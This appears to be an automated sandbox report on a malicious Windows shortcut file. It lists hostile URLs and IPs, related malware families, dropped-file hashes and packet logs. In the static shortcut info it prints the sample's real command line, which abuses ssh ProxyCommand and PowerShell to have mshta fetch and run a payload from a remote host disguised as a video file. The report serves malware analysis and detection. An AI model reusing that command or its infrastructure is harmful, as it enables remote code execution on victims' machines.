https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4k	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp48D	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4o	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4https://docshare.ic	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4$global:?	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4z	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4A	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4t	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/ImportantInformation.pdf	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4dG	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4H	100%	Avira URL Cloud	malware
https://docshare.icu/tem	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4C:	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
docshare.icu	185.208.156.80	true	true		unknown
241.42.69.40.in-addr.arpa	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/ImportantInformation.pdf	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://docshare.icu/w	mshta.exe, 00000005.00000002.2817910967.000001F35BE23000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4V	powershell.exe, 00000004.00000002.1588818359.0000020AF9082000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp48D	mshta.exe, 00000005.00000002.2817910967.000001F35BDD7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://aka.ms/pscore6	powershell.exe, 00000004.00000002.1585794335.0000020A80025000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docshare.icu/G	mshta.exe, 00000005.00000002.2817910967.000001F35BE23000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...	mshta.exe, 00000005.00000002.2819281620.000001FB5E970000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4m	mshta.exe, 00000005.00000002.2817910967.000001F35BDD7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4k	powershell.exe, 00000004.00000002.1589911445.0000020AFB090000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4p	powershell.exe, 00000004.00000002.1585794335.0000020A80001000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...a	mshta.exe, 00000005.00000002.2819281620.000001FB5E970000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4o	powershell.exe, 00000004.00000002.1589337260.0000020AFAA10000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4t	powershell.exe, 00000004.00000002.1589911445.0000020AFB090000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4dG	mshta.exe, 00000005.00000002.2817910967.000001F35BDD7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4https://docshare.ic	mshta.exe, 00000005.00000002.2819830654.000001FB5EDC5000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4z	mshta.exe, 00000005.00000002.2817910967.000001F35BD85000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4$global:?	powershell.exe	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4A	mshta.exe, 00000005.00000002.2817910967.000001F35BDFC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4H	powershell.exe, 00000004.00000002.1589193192.0000020AF9310000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.1585794335.0000020A8006E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docshare.icu/tem	ssh.exe, 00000000.00000002.2817656658.000002CF6CAA9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1585794335.0000020A80025000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4C:	mshta.exe, 00000005.00000002.2817910967.000001F35BD60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2817910967.000001F35BE42000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4O	mshta.exe, 00000005.00000002.2817910967.000001F35BD85000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.208.156.80	docshare.icu	Switzerland		42624	SIMPLECARRIERCH	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1604925
Start date and time:	2025-02-02 07:40:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	anov3mrRa1.lnk renamed because original name is a hash value
Original Sample Name:	601862f43afd9315c5216580679745a3.lnk
Detection:	MAL
Classification:	mal76.winLNK@8/6@3/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 40.69.42.241, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 6788 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2672 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SIMPLECARRIERCH	https://minex360.acemlnb.com/lt.php?x=3DZy~GDLV3DMDKB7yNtHVuCgAX7SvdAfle4vYnjFJqWZ6p77z0y.0uFs23zziNHzkfYwXHcWInGZ75z	Get hash	malicious	Unknown	Browse	185.196.11.177
	55PjLLodpm.exe	Get hash	malicious	Remcos	Browse	185.196.9.248
	NlFVywnjLL.exe	Get hash	malicious	Remcos	Browse	185.196.9.248
	jP2Z8FIPx3.exe	Get hash	malicious	Remcos	Browse	185.196.9.248
	https://vscloud-auth098-msuser365-8675654-cloud.vercel.app/	Get hash	malicious	Unknown	Browse	185.208.156.66
	https://www.surveymonkey.com/tr/v1/te/fP1ElyAh3LrqKx24JsmD6ODtGOJwRcRt5qVxrYIEJEHUElyeJAfL_2BKym0kGXzEGoAPJ7mj9hHP_2FbInvSBSXSODJbn0efHfXAOTjSwu4vDqLEu9n5ZG_2FsdwlSjWOWVV1Y_2BR2XkO30P3B1Fa298_2BZW5_2F7YMlTq5O8aCHUpn_2F02dR9LcOCZqh3yaUg_2BW57lOq_2FAbkkyklhhkvPpUD83QimwzquPOI5N9zIM36hBWCYjelonII4Uk357bow0DkPDmd3A3K6tnq3ccg6PTON1m3Lvh1mp84C75JBUbHVxLw_2BDj1FZdQ1Xe4gsfjPUfElFRZgaai_2BWe6or91PZ_2FGII23e_2FCXnc8IQ0oJ2fT3jMTSY4Zx9mGqdjeKzP8YIOAq3aBDb20g2G3Jtht0BiiqE3VEU_2FljXzX5O9qGvlRnD58JMJLqIhOyhltrl5iTR7ulSyjLp75u5aKwtSqRrev6L89jbsGcB9_2BED2mMKDbNl6CEUDcZcV09TD5rchi9Tq1484mf0jQhKY60OFIxJcaADmY_2FBkPKmG0F6KSKyTBAst5NXfEIl2p6qjflCh_2F65OakN1ODxGKy3OSGyrtZZlHSgU438K6QLy3NX0DWR_2FmhkXCJZcOFN6yEnaVuF1xa9RChsFdxLzY_2FoE3d4G0ag9eMot4SnXBw_3D_3D	Get hash	malicious	Unknown	Browse	185.196.11.177
	JiH0aUfOU6.exe	Get hash	malicious	Unknown	Browse	185.196.10.22
	Needle_Setup.exe	Get hash	malicious	Unknown	Browse	185.196.10.22
	Needle_Setup.exe	Get hash	malicious	Unknown	Browse	185.196.10.22
	fenty.arm4.elf	Get hash	malicious	Mirai	Browse	185.196.9.234

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	KmW5XCbSss.exe	Get hash	malicious	Quasar	Browse	185.208.156.80
	http://emergencymail49.wixstudio.com/mycurrentlyupdate	Get hash	malicious	Unknown	Browse	185.208.156.80
	http://hfeuqlhcaz.duckdns.org/en/	Get hash	malicious	Unknown	Browse	185.208.156.80
	https://diagnostika.com.ar/presupuesto/c/?fbclid=PAY2xjawIKdlhleHRuA2F	Get hash	malicious	Unknown	Browse	185.208.156.80
	http://pancake-eat-info.com/	Get hash	malicious	Unknown	Browse	185.208.156.80
	https://3658509.cc/	Get hash	malicious	Unknown	Browse	185.208.156.80
	https://3658505.cc/	Get hash	malicious	Unknown	Browse	185.208.156.80
	https://u.to/NL2jIQ	Get hash	malicious	Unknown	Browse	185.208.156.80
	https://cn.315manx.com/home/register/	Get hash	malicious	Unknown	Browse	185.208.156.80
	http://potent-spiced-partridge.glitch.me/	Get hash	malicious	Unknown	Browse	185.208.156.80
37f463bf4616ecd445d4a1937da06e19	tvhaqk.exe	Get hash	malicious	Vidar	Browse	185.208.156.80
	uykb.exe	Get hash	malicious	Vidar	Browse	185.208.156.80
	random.exe	Get hash	malicious	Vidar	Browse	185.208.156.80
	random.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.208.156.80
	random.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	185.208.156.80
	installer3.exe	Get hash	malicious	XRed	Browse	185.208.156.80
	iexplore.exe	Get hash	malicious	XRed	Browse	185.208.156.80
	bound.exe	Get hash	malicious	XRed	Browse	185.208.156.80
	Microsoft.exe	Get hash	malicious	XRed	Browse	185.208.156.80

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	1397861
Entropy (8bit):	3.8514590679062555
Encrypted:	false
SSDEEP:	12288:mKQK+KAKgKsv3v5KdKjKoKmtRKWKev8vWKFvnRuKVKG:LhjxR1kG50Ibfbz8G
MD5:	83C7AD8E9B6F698B2E56EF1717FCF29F
SHA1:	77A3869EBABA3477A34FC24A59B663420067D3AE
SHA-256:	03888969377783CBCB4A1613B1FA24768F91A1D91C9E13A3D62F06EB2E30E49A
SHA-512:	B4EFAA642F1866BF1C2D79C6EA09D478498C6679BE3AF67C1252A350515C0BC0DF893FEB7A6C3B4C10B4874DD60491AA626329E208C061A5C53F5E68A4709F1E
Malicious:	false
Reputation:	low
Preview:	66B75w6eH63g74H69u6fY6eB20j48H4cq59k4cB28c53X4ed7ar7ag78A6aV29r7bf76p61l72r20r54h59V79h4bF6aY3dr20P27f27X3bP66L6fr72q20P28L76M61Y72s20U4ei49L41X4bb20U3ds20N30X3bX4eo49W41G4bW20o3cQ20N53D4eT7ad7aj78z6aV2eW6cF65H6eR67A74p68k3bJ20f4eG49w41R4bI2bf2bJ29t7bN76N61K72T20r75q58A73J67p20C3da20C53I74s72v69J6eU67N2ep66S72T6fC6ds43X68n61N72J43Q6fJ64F65g28l53D4eJ7aG7aQ78Y6af5bd4ef49E41y4bc5dx20P2dh20B36n33L36n29w3bu54p59r79Z4bK6aV20n3dg20e54h59k79z4bk6aW20p2bz20y75m58e73l67p7dk72K65N74U75a72u6eI20F54L59W79F4bW6aI7dl3bv76L61k72v20u54l59y79y4bx6aT20y3dr20b48a4ci59D4cB28g5bB37G34K38f2cd37E34k37b2cf37a35T35K2cf37d33b37l2ct37n35O30q2ck37A35q31m2cM37u34W30i2cT37h33W37I2cV37Z34U34C2ca37Q34i34f2cK36T38F32Y2cf37m33o37V2cQ37q35g36v2cp37K33v37B2cQ36Y36S38j2ci36B38H31x2cE37K35p35G2cJ36Z36K38d2cF36j38f35R2cu36S36G38Z2cF36A38S31d2cA37b33T37L2cd37S34l38C2cx36y36w38J2cL37I32U31U2cx37i34L36r2cf37D35q30F2ce37e33G37x2cR37t35d31i2cj37e35w32c2cr37e35c30q2cn37H34g31G2cm37W33F35l2cy37m35c32X2cp37a33x37x2cl37N33g36y2cL36o3

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.773832331134527
Encrypted:	false
SSDEEP:	3:NlllulIl:NllUY
MD5:	8C97F19C1DAE939AA2B327515FF4014B
SHA1:	C2446927782898E702DA7F1DB8660B38EED83A3F
SHA-256:	2EB5165261A0C9D54EF167C6D06868E5DE1939D9D83507F0AE7783B49C7821B4
SHA-512:	6483F1D65F798CBA3D442FE8663999D150B427F3717AA644744FBE06278A3783AD0EFE6A8A582D14C72B56BC96D9995C0353B311D08C505C22EEB18E7D899F04
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................r.!.......................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apkkwayl.0qu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyl0s0gn.irj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqvo15zq.xu5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ix4rrpj1.wp4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):	2.649380979414448
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	anov3mrRa1.lnk
File size:	2'430 bytes
MD5:	601862f43afd9315c5216580679745a3
SHA1:	23babb893510faecdd8df07a4a71e683ead6164a
SHA256:	320f2c9ac23ec442f13293da99e423c0bbe1c2229e7febb6a94afabab66e052f
SHA512:	bd749efdb6bbd9c03cdc71ea9a2cd701d754eae5d59f7b13b7709ea6be164d3143691418029dde5b91f305114498111eebcaa9510a7151192a179a4a60c6fd5e
SSDEEP:	24:8Ayj/BF//Z/U9p+/+GNWbUCijYlywEfSXSF/+dd79dsHhaeyD:8ZLZwRGNaUvUwf1/+dJ9V
TLSH:	E14124002AE90325F3B34E75547AB320957FBC15EEB19A1D008D41881727614E8B5F7B
File Content Preview:	L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	72d282828e8d8dd5

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\OpenSSH\ssh.exe
Command Line Argument:	-o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" .
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-02T07:43:43.502205+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.8	62696	185.208.156.80	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 2, 2025 07:41:39.029092073 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:39.029139996 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:39.029232979 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:39.075078011 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:39.075099945 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:39.762301922 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:39.762396097 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:39.818811893 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:39.818830013 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:39.819236040 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:39.819299936 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:39.822031021 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:39.867333889 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.110897064 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.112627029 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.223252058 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.223269939 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.223320007 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.223356962 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.223381042 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.223443031 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.223443031 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.224622011 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.224639893 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.224695921 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.224709034 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.224740028 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.225121975 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.335012913 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.335047007 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.335125923 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.335125923 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.335143089 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.335195065 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.336252928 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.336318970 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.336322069 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.336337090 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.336374998 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.336393118 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.337896109 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.337914944 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.337994099 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.337994099 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.338010073 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.338092089 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.338886976 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.338902950 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.339054108 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.339067936 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.339121103 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.446355104 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.446382046 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.446436882 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.446456909 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.446472883 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.446491957 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.447134972 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.447153091 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.447184086 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.447212934 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.447231054 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.447839022 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.447958946 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.447978973 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.448049068 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.448049068 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.448060989 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.448216915 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.448849916 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.448865891 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.448908091 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.448919058 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.448942900 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.449137926 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.449800968 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.449816942 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.449882984 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.449882984 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.449899912 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.450073957 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.450606108 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.450623035 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.450717926 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.450719118 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.450733900 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.450784922 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.534449100 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.534476995 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.534533978 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.534545898 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.534573078 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.534589052 CET	49708	443	192.168.2.8	185.208.156.80
Feb 2, 2025 07:41:40.557379007 CET	443	49708	185.208.156.80	192.168.2.8
Feb 2, 2025 07:41:40.557405949 CET	443	49708	185.208.156.80	192.168.2.8
